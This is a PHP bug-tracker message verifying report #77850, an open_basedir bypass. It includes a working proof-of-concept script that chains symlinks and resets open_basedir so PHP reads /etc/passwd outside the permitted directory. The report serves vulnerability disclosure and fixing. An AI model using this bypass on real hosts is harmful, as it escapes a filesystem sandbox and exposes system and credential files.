Bug #77850 [Opn->Ver]: Open_basedir bypass

From: Date: Tue, 07 May 2019 09:48:33 +0000
Subject: Bug #77850 [Opn->Ver]: Open_basedir bypass
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-220726@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=77850&edit=1 ID: 77850 Updated by: sjon@php.net Reported by: simon dot vikstrom at gmail dot com Summary: Open_basedir bypass -Status: Open +Status: Verified Type: Bug Package: *Directory/Filesystem functions Operating System: Linux PHP Version: 7.3.4 Block user comment: N Private report: N New Comment: I can confirm this issue - see https://3v4l.org/75AX0 Previous Comments: ------------------------------------------------------------------------ [2019-04-05 04:48:31] simon dot vikstrom at gmail dot com Description: ------------ Blaklis_ on twitter published a open_basedir bypass : https://twitter.com/Blaklis_/status/1113866828739166208 Test script: --------------- <?php /* I could recreat with: mkdir -p /var/www/html chmod -R YOURUSER:YOURUSER /var/www cd /var/www/html/ php -d open_basedir=/var/www FILENAME.php */ mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE); symlink('/var/www/html/a/b/c/d/e/f/g','foo'); ini_set('open_basedir','/var/www/html:bar/'); symlink('foo/../../../../../../','bar'); unlink('foo'); symlink('/var/www/html/','foo'); echo file_get_contents('bar/etc/passwd'); Expected result: ---------------- file_get_contents(): open_basedir restriction in effect. .... Actual result: -------------- Reads /etc/passwd ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=77850&edit=1

« previous php.bugs (#220726) next »